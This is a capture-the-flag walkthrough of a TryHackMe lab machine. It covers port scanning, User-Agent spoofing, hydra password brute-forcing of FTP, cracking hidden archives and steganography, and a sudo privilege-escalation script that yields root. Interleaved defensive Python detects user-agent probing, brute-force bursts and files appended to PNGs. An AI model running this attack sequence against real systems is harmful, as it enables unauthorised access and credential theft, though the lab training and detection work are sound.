TryHackMe — Agent Sudo

Having fun with TryHackMe again. So here is the write-up and guide for passing the Agent Sudo challenge.

Room: https://www.tryhackme.com/room/agentsudoctf
Level: Easy

Task: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

As usual, open the IP in browser first.

No hint here, not even in the source code. Hmm... Let's use nmap to check which and how many ports are open, across the full port range.

# nmap -A -T4 -sV -p- 10.10.X.X
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement

3 ports are open. Now run gobuster to see if there is any hidden path.

# gobuster dir -u http://10.10.X.X -w ~/wordlists/dirb/big.txt -t 50

Nay~~ Checked with multiple dictionaries, no hidden path found. It might have a long or unique name. That's okay, now we run nikto.

# nikto -h 10.10.X.X

Nay also~~ Using okadminfinder3, just in case,

# ./okadminfinder.py -u 10.10.X.X
...
0 Admin pages found
...

So, enough brute-forcing. The hint says that the page only redirects if you have the correct user agent. Switching between Chrome, Firefox, Safari and bot user agents does nothing, so it must be a custom user agent. There are 2 agents: Agent C and Agent R.

Uncheck the presets and choose a custom user agent. Put only “R” as the user agent.

Okay, it changed. Now try changing to the “C” user agent.
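From the defender's side, the interesting signal in this step is one client cycling through User-Agent values against the same page. The following is an added example (not part of the original write-up) that parses Apache combined-format access log lines and flags clients that present many distinct User-Agents, or a bare one-token User-Agent such as “R” or “C”; the log lines and thresholds are constructed for the example.

```python
import re
from collections import defaultdict

# Apache combined log format; the User-Agent is the last quoted field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not taken from the room): one client rotating
# user agents against the same page, and one ordinary visitor.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/120.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "Googlebot/2.1"
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET / HTTP/1.1" 302 0 "-" "R"
10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET / HTTP/1.1" 302 0 "-" "C"
10.0.0.9 - - [01/Jan/2024:10:00:10 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
"""


def parse_log(text):
    """Yield parsed records; malformed lines are skipped rather than raising."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_ua_probing(text, min_distinct=3, max_short_len=3):
    """Return {ip: sorted distinct User-Agents} for clients that look like they
    are enumerating user agents: many distinct UA strings from one address, or
    any suspiciously short UA (a bare token instead of a browser string).
    The thresholds are assumptions chosen for this example."""
    agents = defaultdict(set)
    for rec in parse_log(text):
        agents[rec["ip"]].add(rec["ua"])
    flagged = {}
    for ip, uas in agents.items():
        has_short = any(len(ua) <= max_short_len for ua in uas)
        if len(uas) >= min_distinct or has_short:
            flagged[ip] = sorted(uas)
    return flagged


if __name__ == "__main__":
    for ip, uas in find_ua_probing(SAMPLE_LOG).items():
        print(f"{ip}: {len(uas)} distinct User-Agents -> {uas}")
```

A single address sending five different User-Agents to the same URL in ten seconds is the pattern worth alerting on; the 302 responses to the one-letter agents are the gated redirect the hint refers to.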

Now we have found the name of Agent C. According to the note, the password is weak. Hail hydra then,

# hydra -l XXXXX -P ~/wordlists/rockyou.txt 10.10.X.X ftp
...
[21][ftp] host: 10.10.X.X login: XXXXX password: XXXXXXX
1 of 1 target successfully completed, 1 valid password found
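The hydra run above is exactly what a vsftpd log records as a burst of FAIL LOGIN lines from one client, often followed by one OK LOGIN. The following is an added example (not part of the original write-up) that parses vsftpd-style log lines and alerts on a client exceeding a failure threshold inside a time window, reporting whether a successful login followed; the log lines, threshold and window are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# vsftpd log line shape: '<ctime> [pid N] [user] FAIL LOGIN: Client "ip"'
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"$'
)

# Constructed sample: six failures in ten seconds, then a success, from one
# client; a single unrelated failure from another.
SAMPLE_LOG = """\
Sun Oct 20 10:00:00 2019 [pid 1201] [chris] FAIL LOGIN: Client "10.0.0.5"
Sun Oct 20 10:00:02 2019 [pid 1203] [chris] FAIL LOGIN: Client "10.0.0.5"
Sun Oct 20 10:00:04 2019 [pid 1205] [chris] FAIL LOGIN: Client "10.0.0.5"
Sun Oct 20 10:00:06 2019 [pid 1207] [chris] FAIL LOGIN: Client "10.0.0.5"
Sun Oct 20 10:00:08 2019 [pid 1209] [chris] FAIL LOGIN: Client "10.0.0.5"
Sun Oct 20 10:00:10 2019 [pid 1211] [chris] FAIL LOGIN: Client "10.0.0.5"
Sun Oct 20 10:00:12 2019 [pid 1213] [chris] OK LOGIN: Client "10.0.0.5"
Sun Oct 20 10:05:00 2019 [pid 1301] [anonymous] FAIL LOGIN: Client "10.0.0.9"
"""


def parse_vsftpd(text):
    """Return {ip: [(timestamp, result, user), ...]} sorted by time per client."""
    events = defaultdict(list)
    for line in text.splitlines():
        m = VSFTPD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        events[m["ip"]].append((ts, m["result"], m["user"]))
    for evs in events.values():
        evs.sort()
    return events


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Sliding-window count of failures per client; a client whose peak count
    within the window reaches the threshold is reported, together with the
    user of the first successful login after the burst (None if none)."""
    alerts = {}
    for ip, evs in parse_vsftpd(text).items():
        fails = [ts for ts, res, _ in evs if res == "FAIL"]
        peak, start = 0, 0
        for i, ts in enumerate(fails):
            while (ts - fails[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, i - start + 1)
        if peak >= threshold:
            success_user = next(
                (u for ts, res, u in evs if res == "OK" and ts >= fails[0]), None
            )
            alerts[ip] = {"peak_failures": peak, "success_user": success_user}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['peak_failures']} failures in window, "
              f"then login as {info['success_user']}")
```

A burst of failures that ends in an OK LOGIN is the case to escalate: the account was guessed, not merely attacked.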

Let's access the FTP then,

Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn’t be a problem for you.

From,
Agent C

I think these are stego images. So let's try decoding them,

# steghide extract -sf cute-alien.jpg
steghide: could not extract any data with that passphrase
# steghide extract -sf cutie.png
steghide: the file format of the file "cutie.png" is not supported

For “cutie.png”, “file format is not supported” means it is not an image.

# binwalk cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22

It's a zip file. Let's unzip it.

# unzip cutie.png
Archive: cutie.png
warning [cutie.png]: 34562 extra bytes at beginning or within zipfile
(attempting to process anyway)
skipping: To_agentR.txt need PK compat. v5.1 (can do v4.5)
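What binwalk found is a ZIP archive appended after the PNG's IEND chunk, and unzip's “extra bytes at beginning” warning is the same observation. The following is an added example (not part of the original write-up) that builds a constructed PNG-plus-ZIP file in memory, walks the PNG chunk list to find where the image really ends, and lists the archive members found in the trailing bytes; member names come from the central directory, which stays readable even when the member data is encrypted, as with To_agentR.txt above.

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
ZIP_EOCD = b"PK\x05\x06"


def png_chunk(ctype, payload):
    """Build one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def minimal_png():
    """A valid 1x1 8-bit grayscale PNG, built inline so the example is self-contained."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    raw = b"\x00\x00"  # filter byte 0 followed by one pixel
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(raw))
            + png_chunk(b"IEND", b""))


def make_polyglot(image, inner_name, inner_text):
    """Constructed sample: a ZIP archive appended after the PNG's IEND chunk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(inner_name, inner_text)
    return image + buf.getvalue()


def png_end_offset(data):
    """Walk the chunk list; return the offset just past IEND, or None if not a PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length  # length + type + data + crc
        if ctype == b"IEND":
            return pos
    return None


def find_embedded_zip(data):
    """Report bytes after IEND and, if a ZIP archive starts there, its members
    as (name, uncompressed size, encrypted flag)."""
    end = png_end_offset(data)
    if end is None:
        return None
    report = {"png_end": end, "trailing_bytes": len(data) - end,
              "zip_offset": None, "members": []}
    zip_off = data.find(ZIP_LOCAL_HEADER, end)
    if zip_off == -1 or ZIP_EOCD not in data[zip_off:]:
        return report
    # Carve from the local header so the archive's own offsets line up.
    with zipfile.ZipFile(io.BytesIO(data[zip_off:])) as zf:
        report["members"] = [(i.filename, i.file_size, bool(i.flag_bits & 0x1))
                             for i in zf.infolist()]
    report["zip_offset"] = zip_off
    return report


if __name__ == "__main__":
    sample = make_polyglot(minimal_png(), "To_agentR.txt", "constructed note")
    print(find_embedded_zip(sample))
```

The check a reviewer of uploaded images wants is the `trailing_bytes` count: a well-formed PNG has nothing after IEND, so any non-zero value is worth a second look regardless of what the bytes turn out to be.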

Unable to use unzip. Let's try 7zip.

# 7z x cutie.png
Enter password (will not be echoed):

OK, a password is needed. Crack it using 7zipcracker then.

# ./7zipcrack.sh cutie.png ~/wordlist/rockyou.txt
Password is: XXXXX
# 7z x cutie.png
Enter password (will not be echoed): XXXXX
Everything is Ok
Size: 86
Compressed: 34842
# cat To_agentR.txt
Agent C,
We need to send the picture to 'XXXXXXXX' as soon as possible!
By,
Agent R

It might be a password for another image.

# steghide extract -sf cute-alien.jpg
Enter passphrase: XXXXXXX

Failed! But the password seems weird to me. I decided to check what type of hash this is.

OK, that's easy. Base64.

# echo "XXXXXXX" | base64 -d
XXXXXX

Got the password!

# steghide extract -sf cute-alien.jpg
Enter passphrase: XXXXXXX
extracted data to "message.txt"

Hi XXXXX,

Glad you find this message. Your login password is XXXXXXXXXXX!

Don’t ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

The message already contains the username and the password for SSH.

# ssh XXXXX@10.10.X.X
# ls -al
...
-rw-r--r-- 1 james james 42189 Jun 19 2019 Alien_autospy.jpg
-rw-r--r-- 1 james james 33 Oct 29 2019 user_flag.txt
...
# cat user_flag.txt
b03d975e8c92a7c041XXXXXXXXXXX

“What is the incident of the photo called?” There is something about the image, so let's download it. There is no stego in it, so do a reverse image search with Google Images plus the keyword “foxnews” and you find the incident.

Now privilege escalation. Let's check the basic openers for root.

# sudo su
# cat /etc/crontab
# sudo -l

The hint says there is a CVE to exploit. I used linux-soft-exploit-suggester; because this machine only has Python 3, I needed to convert the Python code to version 3. Let's run it.

# python3 linux-soft-exploit-suggester.py
[!] Bash 5.0 Patch 11 - SUID Priv Drop Exploit - linux
From: bash 4.4.18
File: /usr/share/exploitdb/exploits/linux/local/47726.sh
Url: https://www.exploit-db.com/exploits/47726
[!] Fuse 2.9.3-15 - Local Privilege Escalation - linux
From: fuse 2.9.7
File: /usr/share/exploitdb/exploits/linux/local/37089.txt
Url: https://www.exploit-db.com/exploits/37089
[!] GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage - multiple
From: groff 1.22.3
File: /usr/share/exploitdb/exploits/multiple/local/19430.txt
Url: https://www.exploit-db.com/exploits/19430
[!] Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH - linux
From: libc 2.27
File: /usr/share/exploitdb/exploits/linux/local/19302.c
Url: https://www.exploit-db.com/exploits/19302
[!] Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow - linux
From: libc 2.27
File: /usr/share/exploitdb/exploits/linux/local/19360.c
Url: https://www.exploit-db.com/exploits/19360
[!] UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1) - multiple
From: libc 2.27
File: /usr/share/exploitdb/exploits/multiple/local/19551.c
Url: https://www.exploit-db.com/exploits/19551
[!] MAWK 1.3.3-17 - Local Buffer Overflow - linux
From: mawk 1.3.3
File: /usr/share/exploitdb/exploits/linux/local/42357.py
Url: https://www.exploit-db.com/exploits/42357
[!] OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) - linux
From: openssh 7.6
File: /usr/share/exploitdb/exploits/linux/remote/45210.py
Url: https://www.exploit-db.com/exploits/45210
[!] OpenSSH 2.3 < 7.7 - Username Enumeration - linux
From: openssh 7.6
File: /usr/share/exploitdb/exploits/linux/remote/45233.py
Url: https://www.exploit-db.com/exploits/45233
[!] OpenSSH < 7.7 - User Enumeration (2) - linux
From: openssh 7.6
File: /usr/share/exploitdb/exploits/linux/remote/45939.py
Url: https://www.exploit-db.com/exploits/45939
[!] sudo 1.8.27 - Security Bypass - linux
From: sudo 1.8.21
File: /usr/share/exploitdb/exploits/linux/local/47502.py
Url: https://www.exploit-db.com/exploits/47502
[!] Sudo 1.8.25p - 'pwfeedback' Buffer Overflow - linux
From: sudo 1.8.21
File: /usr/share/exploitdb/exploits/linux/local/48052.sh
Url: https://www.exploit-db.com/exploits/48052
[!] Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1) - multiple
From: sudo 1.8.21
File: /usr/share/exploitdb/exploits/multiple/local/49521.py
Url: https://www.exploit-db.com/exploits/49521
[!] Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution - linux
From: vim 8.0.1453
File: /usr/share/exploitdb/exploits/linux/local/46973.md
Url: https://www.exploit-db.com/exploits/46973
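The suggester output above is noisy: several hits are ancient (libc 5.3.12, groff 1.11) and cannot apply to the versions actually installed, while others give an explicit upper bound (“< 7.7”, “< 8.1.1365”) that the installed version does fall under. The following is an added example (not part of the original write-up or of the suggester tool) that parses these [!] / From: / File: / Url: blocks and sorts them for patch triage: scope taken from the exploit path, and a version verdict where the title states a bound. The embedded sample is a subset of the output shown above; the verdict labels are this example's own.

```python
import re
from collections import defaultdict

# Subset of the linux-soft-exploit-suggester output shown above.
SUGGESTER_OUTPUT = """\
[!] Bash 5.0 Patch 11 - SUID Priv Drop Exploit - linux
From: bash 4.4.18
File: /usr/share/exploitdb/exploits/linux/local/47726.sh
Url: https://www.exploit-db.com/exploits/47726
[!] Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH - linux
From: libc 2.27
File: /usr/share/exploitdb/exploits/linux/local/19302.c
Url: https://www.exploit-db.com/exploits/19302
[!] OpenSSH 2.3 < 7.7 - Username Enumeration - linux
From: openssh 7.6
File: /usr/share/exploitdb/exploits/linux/remote/45233.py
Url: https://www.exploit-db.com/exploits/45233
[!] sudo 1.8.27 - Security Bypass - linux
From: sudo 1.8.21
File: /usr/share/exploitdb/exploits/linux/local/47502.py
Url: https://www.exploit-db.com/exploits/47502
[!] Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution - linux
From: vim 8.0.1453
File: /usr/share/exploitdb/exploits/linux/local/46973.md
Url: https://www.exploit-db.com/exploits/46973
"""

UPPER_BOUND_RE = re.compile(r"<\s*(\d+(?:\.\d+)+)")


def parse_version(s):
    """'8.0.1453' -> (8, 0, 1453); tuples compare component-wise."""
    return tuple(int(p) for p in s.split("."))


def parse_suggester(text):
    """Turn the [!]/From:/File:/Url: blocks into dicts. Tolerates a bare '[!]'
    line with the title on the following line, as in the first entry above."""
    records, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[!]"):
            cur = {"title": line[3:].strip(), "package": None,
                   "installed": None, "file": None, "url": None}
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith("From:"):
            pkg, _, ver = line[5:].strip().partition(" ")
            cur["package"], cur["installed"] = pkg, ver
        elif line.startswith("File:"):
            cur["file"] = line[5:].strip()
        elif line.startswith("Url:"):
            cur["url"] = line[4:].strip()
        elif not cur["title"]:
            cur["title"] = line
    return records


def triage(records):
    """Add scope (local/remote from the exploit path) and a verdict: when the
    title states '< fixed', compare the installed version against it;
    otherwise the hit needs a manual check. Distribution backports can fix
    a bug without bumping the upstream version, so 'in range' is a prompt
    to verify, not a confirmed vulnerability."""
    out = []
    for r in records:
        scope = "remote" if "/remote/" in (r["file"] or "") else "local"
        verdict = "no bound in title: manual check"
        bound = UPPER_BOUND_RE.search(r["title"])
        if bound and r["installed"]:
            if parse_version(r["installed"]) < parse_version(bound.group(1)):
                verdict = "in advisory range: verify vendor backport"
            else:
                verdict = "outside advisory range"
        out.append({"package": r["package"], "installed": r["installed"],
                    "scope": scope, "verdict": verdict, "title": r["title"]})
    return out


def by_package(triaged):
    """Group triaged hits per package so each package is patched once."""
    grouped = defaultdict(list)
    for t in triaged:
        grouped[t["package"]].append(t)
    return dict(grouped)


if __name__ == "__main__":
    for pkg, hits in by_package(triage(parse_suggester(SUGGESTER_OUTPUT))).items():
        print(f"{pkg} {hits[0]['installed']}:")
        for h in hits:
            print(f"  [{h['scope']}] {h['verdict']} :: {h['title']}")
```

Run on the full output above, the grouping shows the real work list is short: the packages named in the hint (sudo, and the remotely reachable openssh) rather than the long tail of decades-old libc entries.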

I tried every CVE that causes privilege escalation and found 1 (CVE-XXXX–XXXXX). Here is the step: download the CVE PoC script and run it.

# bash cve.sh
[sudo] password for james:
[-] This user has sudo rights
[-] Checking sudo version
[-] This sudo version is vulnerable
[-] Trying to exploit
# id
uid=0(root) gid=1000(james) groups=1000(james)
# sudo su
# root@agent-sudo:/home/james#

Now root access is available! You own everything. Find the root flag.

To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is b53a02f55b57d4439e3341XXXXXXXXX
By,
DesKel a.k.a Agent R

Completed!!!

Software Engineer at Teratotech.com
